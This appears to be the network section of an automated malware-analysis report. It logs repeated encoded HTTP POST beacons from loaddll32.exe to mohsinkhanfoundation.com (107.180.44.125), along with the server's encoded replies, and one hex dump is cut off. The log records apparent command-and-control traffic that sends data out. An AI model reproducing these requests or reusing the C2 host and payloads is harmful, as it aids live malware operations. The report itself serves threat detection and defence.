                                          Data Raw: 0d 0d 0d 09 09 09 0a 0a 0a 65 58 70 37 51 55 56 43 51 30 46 42 66 6e 31 35 65 58 74 35 66 48 74 39 66 30 4a 42 51 30 4a 47 51 6e 70 79 66 6d 4a 2b 63 33 4e 6c 66 58 70 37 5a 48 78 2b 51 6b 46 44 51 6b 5a 43 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 56 43 51 55 4e 43 52 6b 49 46 42 51 55 4a 51 6b 46 44 51 6b 5a 43 42 51 55 46 43 55 4a 42 51 30 4a 47 51 67 55 46 42 51 6c 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 5a 42 52 55 4a 44 51 55 46 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 59 3d 0a 0a 0a 09 09 09 0d 0d 0d
                                          Data Ascii: eXp7QUVCQ0FBfn15eXt5fHt9f0JBQ0JGQnpyfmJ+c3NlfXp7ZHx+QkFDQkZCfX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkVCQUNCRkIFBQUJQkFDQkZCBQUFCUJBQ0JGQgUFBQlCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEZBRUJDQUFCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEY=


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          22192.168.2.749790107.180.44.12580C:\Windows\System32\loaddll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 20:26:04.408070087 CEST1460OUTPOST /pcQLeLMbur/HiYFeTpyPng4KCF4Pzk8EQgqOQkgOA0PBUJ7cn5henxzYn1lfQ== HTTP/1.1
                                          Host: mohsinkhanfoundation.com
                                          Content-Length: 80
                                          Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a
                                          Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                                          Sep 27, 2021 20:26:04.856187105 CEST1468INHTTP/1.1 200 OK
                                          Date: Mon, 27 Sep 2021 18:26:04 GMT
                                          Server: Apache
                                          X-Powered-By: PHP/7.2.34
                                          Upgrade: h2,h2c
                                          Connection: Upgrade
                                          Content-Length: 270
                                          Vary: Accept-Encoding,User-Agent
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 0d 0d 0d 09 09 09 0a 0a 0a 65 58 70 37 51 55 56 43 51 30 46 42 66 6e 31 35 65 58 74 35 66 48 74 39 65 45 4a 42 51 30 4a 47 51 6e 70 79 66 6d 4a 2b 63 33 4e 6c 66 58 70 37 5a 48 78 2b 51 6b 46 44 51 6b 5a 43 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 56 43 51 55 4e 43 52 6b 49 46 42 51 55 4a 51 6b 46 44 51 6b 5a 43 42 51 55 46 43 55 4a 42 51 30 4a 47 51 67 55 46 42 51 6c 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 5a 42 52 55 4a 44 51 55 46 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 59 3d 0a 0a 0a 09 09 09 0d 0d 0d
                                          Data Ascii: eXp7QUVCQ0FBfn15eXt5fHt9eEJBQ0JGQnpyfmJ+c3NlfXp7ZHx+QkFDQkZCfX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkVCQUNCRkIFBQUJQkFDQkZCBQUFCUJBQ0JGQgUFBQlCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEZBRUJDQUFCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEY=


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          23192.168.2.749792107.180.44.12580C:\Windows\System32\loaddll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 20:26:05.150487900 CEST1470OUTPOST /pcQLeLMbur/JhANAzl6Gw8FBhMABRYGcn9CfXZ5ZHp6d2V4ZXs= HTTP/1.1
                                          Host: mohsinkhanfoundation.com
                                          Content-Length: 80
                                          Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a
                                          Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                                          Sep 27, 2021 20:26:05.596282959 CEST1472INHTTP/1.1 200 OK
                                          Date: Mon, 27 Sep 2021 18:26:05 GMT
                                          Server: Apache
                                          X-Powered-By: PHP/7.2.34
                                          Upgrade: h2,h2c
                                          Connection: Upgrade
                                          Content-Length: 270
                                          Vary: Accept-Encoding,User-Agent
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 0d 0d 0d 09 09 09 0a 0a 0a 65 58 70 37 51 55 56 43 51 30 46 42 66 6e 31 35 65 58 74 35 66 48 74 39 65 55 4a 42 51 30 4a 47 51 6e 70 79 66 6d 4a 2b 63 33 4e 6c 66 58 70 37 5a 48 78 2b 51 6b 46 44 51 6b 5a 43 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 56 43 51 55 4e 43 52 6b 49 46 42 51 55 4a 51 6b 46 44 51 6b 5a 43 42 51 55 46 43 55 4a 42 51 30 4a 47 51 67 55 46 42 51 6c 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 5a 42 52 55 4a 44 51 55 46 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 59 3d 0a 0a 0a 09 09 09 0d 0d 0d
                                          Data Ascii: eXp7QUVCQ0FBfn15eXt5fHt9eUJBQ0JGQnpyfmJ+c3NlfXp7ZHx+QkFDQkZCfX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkVCQUNCRkIFBQUJQkFDQkZCBQUFCUJBQ0JGQgUFBQlCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEZBRUJDQUFCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEY=


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          24192.168.2.749794107.180.44.12580C:\Windows\System32\loaddll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 20:26:05.916579962 CEST1480OUTPOST /pcQLeLMbur/DRs5e3gJAw4gNkJ7cn5henxzYn1lfQ== HTTP/1.1
                                          Host: mohsinkhanfoundation.com
                                          Content-Length: 80
                                          Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a
                                          Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                                          Sep 27, 2021 20:26:06.359461069 CEST1482INHTTP/1.1 200 OK
                                          Date: Mon, 27 Sep 2021 18:26:05 GMT
                                          Server: Apache
                                          X-Powered-By: PHP/7.2.34
                                          Upgrade: h2,h2c
                                          Connection: Upgrade
                                          Content-Length: 270
                                          Vary: Accept-Encoding,User-Agent
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 0d 0d 0d 09 09 09 0a 0a 0a 65 58 70 37 51 55 56 43 51 30 46 42 66 6e 31 35 65 58 74 35 66 48 74 39 65 6b 4a 42 51 30 4a 47 51 6e 70 79 66 6d 4a 2b 63 33 4e 6c 66 58 70 37 5a 48 78 2b 51 6b 46 44 51 6b 5a 43 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 56 43 51 55 4e 43 52 6b 49 46 42 51 55 4a 51 6b 46 44 51 6b 5a 43 42 51 55 46 43 55 4a 42 51 30 4a 47 51 67 55 46 42 51 6c 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 5a 42 52 55 4a 44 51 55 46 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 59 3d 0a 0a 0a 09 09 09 0d 0d 0d
                                          Data Ascii: eXp7QUVCQ0FBfn15eXt5fHt9ekJBQ0JGQnpyfmJ+c3NlfXp7ZHx+QkFDQkZCfX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkVCQUNCRkIFBQUJQkFDQkZCBQUFCUJBQ0JGQgUFBQlCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEZBRUJDQUFCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEY=


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          25192.168.2.749796107.180.44.12580C:\Windows\System32\loaddll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 20:26:06.693687916 CEST1490OUTPOST /pcQLeLMbur/P34KJnkbASUWPzEYIgcWQntyfmF6fHNifWV9 HTTP/1.1
                                          Host: mohsinkhanfoundation.com
                                          Content-Length: 80
                                          Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a
                                          Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                                          Sep 27, 2021 20:26:07.106373072 CEST1491INHTTP/1.1 200 OK
                                          Date: Mon, 27 Sep 2021 18:26:06 GMT
                                          Server: Apache
                                          X-Powered-By: PHP/7.2.34
                                          Upgrade: h2,h2c
                                          Connection: Upgrade
                                          Content-Length: 270
                                          Vary: Accept-Encoding,User-Agent
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 0d 0d 0d 09 09 09 0a 0a 0a 65 58 70 37 51 55 56 43 51 30 46 42 66 6e 31 35 65 58 74 35 66 48 74 39 65 6b 4a 42 51 30 4a 47 51 6e 70 79 66 6d 4a 2b 63 33 4e 6c 66 58 70 37 5a 48 78 2b 51 6b 46 44 51 6b 5a 43 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 56 43 51 55 4e 43 52 6b 49 46 42 51 55 4a 51 6b 46 44 51 6b 5a 43 42 51 55 46 43 55 4a 42 51 30 4a 47 51 67 55 46 42 51 6c 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 5a 42 52 55 4a 44 51 55 46 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 59 3d 0a 0a 0a 09 09 09 0d 0d 0d
                                          Data Ascii: eXp7QUVCQ0FBfn15eXt5fHt9ekJBQ0JGQnpyfmJ+c3NlfXp7ZHx+QkFDQkZCfX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkVCQUNCRkIFBQUJQkFDQkZCBQUFCUJBQ0JGQgUFBQlCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEZBRUJDQUFCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEY=


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          26192.168.2.749798107.180.44.12580C:\Windows\System32\loaddll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 20:26:07.417212963 CEST1500OUTPOST /pcQLeLMbur/ES1CfXZ5ZHp6d2V4ZXs= HTTP/1.1
                                          Host: mohsinkhanfoundation.com
                                          Content-Length: 80
                                          Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a
                                          Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                                          Sep 27, 2021 20:26:07.873385906 CEST1501INHTTP/1.1 200 OK
                                          Date: Mon, 27 Sep 2021 18:26:07 GMT
                                          Server: Apache
                                          X-Powered-By: PHP/7.2.34
                                          Upgrade: h2,h2c
                                          Connection: Upgrade
                                          Content-Length: 270
                                          Vary: Accept-Encoding,User-Agent
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 0d 0d 0d 09 09 09 0a 0a 0a 65 58 70 37 51 55 56 43 51 30 46 42 66 6e 31 35 65 58 74 35 66 48 74 39 65 30 4a 42 51 30 4a 47 51 6e 70 79 66 6d 4a 2b 63 33 4e 6c 66 58 70 37 5a 48 78 2b 51 6b 46 44 51 6b 5a 43 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 56 43 51 55 4e 43 52 6b 49 46 42 51 55 4a 51 6b 46 44 51 6b 5a 43 42 51 55 46 43 55 4a 42 51 30 4a 47 51 67 55 46 42 51 6c 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 5a 42 52 55 4a 44 51 55 46 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 59 3d 0a 0a 0a 09 09 09 0d 0d 0d
                                          Data Ascii: eXp7QUVCQ0FBfn15eXt5fHt9e0JBQ0JGQnpyfmJ+c3NlfXp7ZHx+QkFDQkZCfX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkVCQUNCRkIFBQUJQkFDQkZCBQUFCUJBQ0JGQgUFBQlCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEZBRUJDQUFCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEY=


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          27192.168.2.749800107.180.44.12580C:\Windows\System32\loaddll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 20:26:08.143009901 CEST1510OUTPOST /pcQLeLMbur/GAUAID5zCzE+BzoOJAtGenN5Yn59cmV+YXw= HTTP/1.1
                                          Host: mohsinkhanfoundation.com
                                          Content-Length: 80
                                          Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a
                                          Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                                          Sep 27, 2021 20:26:08.534300089 CEST1511INHTTP/1.1 200 OK
                                          Date: Mon, 27 Sep 2021 18:26:08 GMT
                                          Server: Apache
                                          X-Powered-By: PHP/7.2.34
                                          Upgrade: h2,h2c
                                          Connection: Upgrade
                                          Content-Length: 270
                                          Vary: Accept-Encoding,User-Agent
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 0d 0d 0d 09 09 09 0a 0a 0a 65 58 70 37 51 55 56 43 51 30 46 42 66 6e 31 35 65 58 74 35 66 48 74 39 64 45 4a 42 51 30 4a 47 51 6e 70 79 66 6d 4a 2b 63 33 4e 6c 66 58 70 37 5a 48 78 2b 51 6b 46 44 51 6b 5a 43 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 56 43 51 55 4e 43 52 6b 49 46 42 51 55 4a 51 6b 46 44 51 6b 5a 43 42 51 55 46 43 55 4a 42 51 30 4a 47 51 67 55 46 42 51 6c 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 5a 42 52 55 4a 44 51 55 46 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 59 3d 0a 0a 0a 09 09 09 0d 0d 0d
                                          Data Ascii: eXp7QUVCQ0FBfn15eXt5fHt9dEJBQ0JGQnpyfmJ+c3NlfXp7ZHx+QkFDQkZCfX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkVCQUNCRkIFBQUJQkFDQkZCBQUFCUJBQ0JGQgUFBQlCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEZBRUJDQUFCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEY=


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          28192.168.2.749802107.180.44.12580C:\Windows\System32\loaddll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 20:26:08.841104984 CEST1513OUTPOST /pcQLeLMbur/fxgDNT4yEngregozMnp+J0N6dX1le310YXlkfA== HTTP/1.1
                                          Host: mohsinkhanfoundation.com
                                          Content-Length: 80
                                          Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a
                                          Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                                          Sep 27, 2021 20:26:09.234930038 CEST1521INHTTP/1.1 200 OK
                                          Date: Mon, 27 Sep 2021 18:26:08 GMT
                                          Server: Apache
                                          X-Powered-By: PHP/7.2.34
                                          Upgrade: h2,h2c
                                          Connection: Upgrade
                                          Content-Length: 270
                                          Vary: Accept-Encoding,User-Agent
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 0d 0d 0d 09 09 09 0a 0a 0a 65 58 70 37 51 55 56 43 51 30 46 42 66 6e 31 35 65 58 74 35 66 48 74 39 64 55 4a 42 51 30 4a 47 51 6e 70 79 66 6d 4a 2b 63 33 4e 6c 66 58 70 37 5a 48 78 2b 51 6b 46 44 51 6b 5a 43 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 56 43 51 55 4e 43 52 6b 49 46 42 51 55 4a 51 6b 46 44 51 6b 5a 43 42 51 55 46 43 55 4a 42 51 30 4a 47 51 67 55 46 42 51 6c 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 5a 42 52 55 4a 44 51 55 46 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 59 3d 0a 0a 0a 09 09 09 0d 0d 0d
                                          Data Ascii: eXp7QUVCQ0FBfn15eXt5fHt9dUJBQ0JGQnpyfmJ+c3NlfXp7ZHx+QkFDQkZCfX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkVCQUNCRkIFBQUJQkFDQkZCBQUFCUJBQ0JGQgUFBQlCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEZBRUJDQUFCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEY=


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          29192.168.2.749804107.180.44.12580C:\Windows\System32\loaddll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 20:26:09.495845079 CEST1522OUTPOST /pcQLeLMbur/DxMffwwOHXMHeXJDenV9ZXt9dGF5ZHw= HTTP/1.1
                                          Host: mohsinkhanfoundation.com
                                          Content-Length: 80
                                          Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a
                                          Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                                          Sep 27, 2021 20:26:09.906132936 CEST1530INHTTP/1.1 200 OK
                                          Date: Mon, 27 Sep 2021 18:26:09 GMT
                                          Server: Apache
                                          X-Powered-By: PHP/7.2.34
                                          Upgrade: h2,h2c
                                          Connection: Upgrade
                                          Content-Length: 270
                                          Vary: Accept-Encoding,User-Agent
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 0d 0d 0d 09 09 09 0a 0a 0a 65 58 70 37 51 55 56 43 51 30 46 42 66 6e 31 35 65 58 74 35 66 48 74 39 64 55 4a 42 51 30 4a 47 51 6e 70 79 66 6d 4a 2b 63 33 4e 6c 66 58 70 37 5a 48 78 2b 51 6b 46 44 51 6b 5a 43 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 56 43 51 55 4e 43 52 6b 49 46 42 51 55 4a 51 6b 46 44 51 6b 5a 43 42 51 55 46 43 55 4a 42 51 30 4a 47 51 67 55 46 42 51 6c 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 5a 42 52 55 4a 44 51 55 46 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 59 3d 0a 0a 0a 09 09 09 0d 0d 0d
                                          Data Ascii: eXp7QUVCQ0FBfn15eXt5fHt9dUJBQ0JGQnpyfmJ+c3NlfXp7ZHx+QkFDQkZCfX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkVCQUNCRkIFBQUJQkFDQkZCBQUFCUJBQ0JGQgUFBQlCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEZBRUJDQUFCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEY=


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          3192.168.2.749751107.180.44.12580C:\Windows\System32\loaddll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 20:25:47.943732023 CEST997OUTPOST /pcQLeLMbur/eDkkAA0bInx9RnpzeWJ+fXJlfmF8 HTTP/1.1
                                          Host: mohsinkhanfoundation.com
                                          Content-Length: 80
                                          Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a
                                          Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                                          Sep 27, 2021 20:25:48.418602943 CEST1005INHTTP/1.1 200 OK
                                          Date: Mon, 27 Sep 2021 18:25:47 GMT
                                          Server: Apache
                                          X-Powered-By: PHP/7.2.34
                                          Upgrade: h2,h2c
                                          Connection: Upgrade
                                          Content-Length: 3610
                                          Vary: Accept-Encoding,User-Agent
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 0d 0d 0d 09 09 09 0a 0a 0a 65 58 70 37 51 55 56 43 51 30 46 42 66 6e 31 35 65 58 74 35 66 48 74 2f 64 45 4a 42 51 30 4a 47 51 6e 70 79 66 6d 4a 2b 63 33 4e 6c 66 58 70 37 5a 48 78 2b 51 6b 46 44 51 6b 5a 43 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 56 43 51 55 4e 43 52 6b 49 46 42 51 55 4a 51 6b 46 44 51 6b 5a 43 42 51 55 46 43 55 4a 42 51 30 4a 47 51 67 55 46 42 51 6c 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 5a 42 52 55 4a 44 51 55 46 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 63 74 4c 32 38 75 63 6d 74 30 64 6d 74 36 65 32 78 2f 65 32 70 37 66 47 39 39 65 6d 74 30 64 6d 73 76 66 6d 78 38 65 6d 6f 76 66 6d 39 39 66 6d 74 30 4c 57 74 2f 65 57 78 38 65 32 70 7a 4c 6d 39 2b 65 47 74 38 4c 47 74 79 4b 57 78 36 65 57 70 36 65 47 39 7a 4b 47 74 37 66 57 74 34 63 32 78 2f 4c 57 6f 70 65 32 39 2f 4b 32 74 2b 65 57 74 35 65 6d 77 70 4c 57 70 34 66 57 38 6f 65 6d 73 74 4c 47 74 35 4b 47 78 35 65 6d 70 38 4c 32 39 37 65 47 74 2b 4c 47 74 34 65 32 77 73 65 6d 6f 6f 4b 6d 